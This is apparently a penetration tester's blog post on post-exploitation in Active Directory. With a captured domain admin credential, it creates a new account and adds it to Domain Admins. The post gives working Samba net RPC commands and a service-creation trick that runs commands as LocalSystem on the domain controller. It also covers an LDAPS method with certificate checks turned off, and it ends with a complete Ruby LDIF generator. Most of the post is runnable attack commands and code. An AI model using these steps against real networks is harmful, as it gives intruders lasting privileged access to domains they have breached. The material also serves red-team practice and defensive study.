I find myself creating Active Directory accounts fairly often. But of course I'm never doing it as a genuine domain administrator. That means I might not have MMC available to me – or maybe not even an RDP session! This post summarizes a few ways I've found handy in various situations.

All of these methods assume that I have somehow obtained a domain administrator account, so this isn’t “exploitation” so much as “post exploitation”. In this case, I’m going to be adding an account named eve to the domain EMPIRE via the domain controller palpatine. There are certainly other methods (e.g., WMI, though I’ve never been driven to use it to create a user thus far; or PSEXEC, which I use all the time, but isn’t all that exciting), so this is not exhaustive.

The Samba net Command, Part I

Samba includes a net command that's very similar to the traditional Microsoft utility of the same name. It's more powerful in many ways, though. The rpc subcommands speak MS-RPC (here SAMR) over SMB named pipes, so all you need is 445/TCP to the domain controller. If the domain is configured "normally", then the net command should work just fine. It goes something like this:

# net -U EMPIRE\\administrator%Password1 -S palpatine rpc user add eve Password1
Added user 'eve'.
# net -U EMPIRE\\administrator%Password1 -S palpatine rpc group addmem "Domain Admins" eve

The Samba net Command, Part II

I’ve had at least one occasion where this did not work. I had compromised a protected network by obtaining a domain admin credential and finding a host that could communicate exclusively with the domain controller on port 445/TCP. While handy, I found that the above commands didn’t work. Later, I found that the administrators had hardened the domain controller in some unusual ways, one of which crippled a number of RPC calls required to accomplish the above. Not to be undone, I found another way using some net functionality that still worked for me:

# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
    "cmd /c start /b cmd /c net user /domain /add eve Password1"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed.  [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN

The WERR_SERVICE_REQUEST_TIMEOUT is expected: cmd.exe never checks in with the Service Control Manager, so the start request times out even though the command has already run as LocalSystem on the domain controller (this is the same create/start/delete trick psexec-style tools use, which is why it only needs 445/TCP). Then add the user to the Domain Admins group the same way:

# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
    "cmd /c start /b cmd /c net group /domain /add \"Domain Admins\" eve"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed.  [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN

Manually via LDAP

Occasionally, I will find a scenario where I don't have access to useful ports like SMB (445/TCP), but I might have access to LDAP (389/TCP) or LDAPS (636/TCP). In this case, you can still create a domain admin, but it's a little tricky: Active Directory refuses to set a password (the unicodePwd attribute) over a cleartext connection, so the password step has to go over LDAPS or an otherwise encrypted session. There are some howtos that you can staple together from the Internet to get there, but here's the quick way:

  1. Make sure you have ldap-utils installed
  2. Create a local ldaprc file that disables certificate checking (TLS_REQCERT never), because the DC's LDAPS certificate is usually self-signed or issued by an internal CA your box doesn't trust
  3. Create an LDIF file that describes the new user:
    1. First, create the user as a disabled account (userAccountControl 514) with no password
    2. Set unicodePwd to the password wrapped in double quotes, encoded as UTF-16LE and then Base64-encoded for the LDIF
    3. Enable the account (userAccountControl 512)
    4. Add the account to the "Domain Admins" group (add its DN to the group's member attribute)
  4. Use ldapmodify (or one of its friends) over LDAPS to run the LDIF file

I have written a handy script for this, which makes it look something like this:

# ruby ldapcreate.rb palpatine EMPIRE administrator DC=empire,DC=local eve Password1

-=-=-= LDAP Admin Creator =-=-=-
by Josh Stone (yakovdk@gmail.com)

Enter LDAP Password: 
adding new entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=Domain Admins,CN=Users,DC=empire,DC=local"
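As an added example (this is not the ldapcreate.rb script above, just a stand-alone illustration of the four LDIF operations it performs), the following Ruby generates the LDIF for those steps so you can feed it to ldapmodify yourself. The base DN, user name, password and the "CN=Users" container are taken from the page's example; the usage of ldapmodify in the comment assumes the DC answers LDAPS on the default port and that an ldaprc with TLS_REQCERT never is in place.

```ruby
#!/usr/bin/env ruby
# Added example, not the post's own script: emit the LDIF that creates an AD
# user disabled, sets its password, enables it and adds it to a group.
#
#   ruby mkadmin.rb DC=empire,DC=local eve Password1 > eve.ldif
#   ldapmodify -H ldaps://palpatine -x -W -D administrator@empire.local -f eve.ldif
#
# Without arguments it prints the LDIF for the page's example (eve in EMPIRE).
require 'base64'

UAC_NORMAL_ACCOUNT = 0x0200 # NORMAL_ACCOUNT flag of userAccountControl
UAC_ACCOUNTDISABLE = 0x0002 # ACCOUNTDISABLE flag of userAccountControl

# AD stores unicodePwd as the UTF-16LE encoding of the password enclosed in
# double quotes. LDIF carries binary attribute values base64-encoded after "::".
def unicode_pwd(password)
  Base64.strict_encode64("\"#{password}\"".encode('UTF-16LE'))
end

# Build the four LDIF records: add (disabled), set password, enable, add to group.
# The user is placed in CN=Users as in the page's example (an assumption; adjust
# the container for other domains).
def build_ldif(base_dn, user, password, group: 'Domain Admins')
  user_dn  = "CN=#{user},CN=Users,#{base_dn}"
  group_dn = "CN=#{group},CN=Users,#{base_dn}"
  domain   = base_dn.scan(/DC=([^,]+)/i).flatten.join('.') # DC=empire,DC=local -> empire.local
  <<~LDIF
    # 1. create the account disabled and without a password
    dn: #{user_dn}
    changetype: add
    objectClass: top
    objectClass: person
    objectClass: organizationalPerson
    objectClass: user
    cn: #{user}
    sAMAccountName: #{user}
    userPrincipalName: #{user}@#{domain}
    userAccountControl: #{UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE}

    # 2. set the password (AD only accepts this over an encrypted session)
    dn: #{user_dn}
    changetype: modify
    replace: unicodePwd
    unicodePwd:: #{unicode_pwd(password)}

    # 3. enable the account
    dn: #{user_dn}
    changetype: modify
    replace: userAccountControl
    userAccountControl: #{UAC_NORMAL_ACCOUNT}

    # 4. add the account to the group
    dn: #{group_dn}
    changetype: modify
    add: member
    member: #{user_dn}
  LDIF
end

if ARGV.size == 3
  puts build_ldif(*ARGV)
elsif ARGV.empty?
  puts build_ldif('DC=empire,DC=local', 'eve', 'Password1')
else
  abort "usage: #{$PROGRAM_NAME} <base DN> <user> <password>"
end
```

Sanity check on the encoding step: the value emitted for Password1 is IgBQAGEAcwBzAHcAbwByAGQAMQAiAA==, which decodes back to "Password1" including the quotes. If you see an "unwilling to perform" error on the unicodePwd record, the session is not encrypted (you connected with ldap:// rather than ldaps://) or the password does not meet the domain's policy.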